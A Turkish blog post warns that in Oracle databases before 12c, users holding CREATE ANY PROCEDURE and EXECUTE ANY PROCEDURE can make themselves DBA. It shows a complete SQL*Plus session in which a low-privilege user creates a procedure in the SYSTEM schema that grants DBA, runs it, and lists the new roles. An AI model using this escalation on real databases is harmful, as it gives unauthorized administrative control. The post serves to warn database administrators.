Create any procedure ve execute any procedure ayrıcalığı olan kullanıcılar kendilerine dba rolü atayabilmektedir

23 Kas by Ahmet Duruöz

Create any procedure ve execute any procedure ayrıcalığı olan kullanıcılar kendilerine dba rolü atayabilmektedir

12c öncesindeki Oracle veritabalarında create any procedure ve execute any procedure ayrıcalığı olan kullanıcıların kendilerine dba rolü atayabilmektedir. 12c ile birlikte bu açık ortadan kalkmıştır. 

Create any procedure ve execute any procedure ayrıcalığı olan bir kullanıcı aşağıdaki adımları takip ederek kendisine DBA rolü atayabilir. Bu yüzden normal bir kullanıcıya create any procedure ve execute any procedure ayrıcalığı verilmemelidir. 

Öncelikle test isimli sadece veritabanına bağlanabilen bir kullanıcı oluşturalım. Sonrasında ilgili kullanıcının nasıl dba rolüne sahip olacağının adımları belirtilmiştir.

 

SQL> create user test identified by test;

User created.

SQL> grant create session to test;

Grant succeeded.

SQL> grant create any procedure to test;

Grant succeeded.

SQL> grant execute any procedure to test;

Grant succeeded.

SQL> exit
Disconnected from Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP,
Data Mining and Real Application Testing options
You have new mail in /var/mail/oracle
oracle@sc01dbadm01:~$ sqlplus test/test 

SQL*Plus: Release 11.2.0.3.0 Production on Wed Nov 23 16:07:33 2022

Copyright (c) 1982, 2011, Oracle. All rights reserved.


Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP,
Data Mining and Real Application Testing options

SQL> select * from session_roles;

no rows selected

SQL> create or replace procedure system.grant_dba_to_test is
 2 begin
 3 execute immediate 'grant dba to test';
 4 end;
 5 /

Procedure created.

SQL> exec system.grant_dba_to_test;

PL/SQL procedure successfully completed.

SQL> exit
Disconnected from Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP,
Data Mining and Real Application Testing options
oracle@sc01dbadm01:~$ sqlplus test/test

SQL*Plus: Release 11.2.0.3.0 Production on Wed Nov 23 16:09:00 2022

Copyright (c) 1982, 2011, Oracle. All rights reserved.


Connected to:
Oracle Database 11g Enterprise Edition Release 11.2.0.3.0 - 64bit Production
With the Partitioning, Real Application Clusters, Automatic Storage Management, OLAP,
Data Mining and Real Application Testing options

SQL> select * from session_roles;

ROLE
------------------------------
DBA
SELECT_CATALOG_ROLE
HS_ADMIN_SELECT_ROLE
HS_ADMIN_ROLE
HS_ADMIN_EXECUTE_ROLE
EXECUTE_CATALOG_ROLE
DELETE_CATALOG_ROLE
EXP_FULL_DATABASE
IMP_FULL_DATABASE
DATAPUMP_EXP_FULL_DATABASE
DATAPUMP_IMP_FULL_DATABASE

ROLE
------------------------------
GATHER_SYSTEM_STATISTICS
SCHEDULER_ADMIN
WM_ADMIN_ROLE
XDBADMIN
XDB_SET_INVOKER
OLAP_DBA
JAVA_ADMIN
JAVA_DEPLOY
OLAP_XS_ADMIN

20 rows selected.

SQL> 

 

Loading

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir